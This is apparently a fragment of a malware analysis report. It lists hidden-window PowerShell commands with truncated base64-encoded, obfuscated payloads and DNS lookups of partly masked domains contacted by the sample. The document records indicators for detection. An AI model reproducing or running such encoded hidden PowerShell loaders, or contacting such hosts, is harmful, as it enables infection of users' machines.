Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAGUAbgBiAGcAYwBlAGoAbgA9ACcAVgBnAGUAagB3AGoAZwBzAHYAZQBuAGcAJwA7ACQASwBzAGEAbQB3AGEAZgBvAHEAIAA9AC...
- DNS ASK go###maair.com
- DNS ASK al###olandia.it
- DNS ASK ag##sh.org
- DNS ASK au#####lehophophop.com
- DNS ASK ay#####e.sakura.ne.jp
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAGUAbgBiAGcAYwBlAGoAbgA9ACcAVgBnAGUAagB3AGoAZwBzAHYAZQBuAGcAJwA7ACQASwBzAGEAbQB3AGEAZgBvAHEAIAA9AC...' (with hidden window)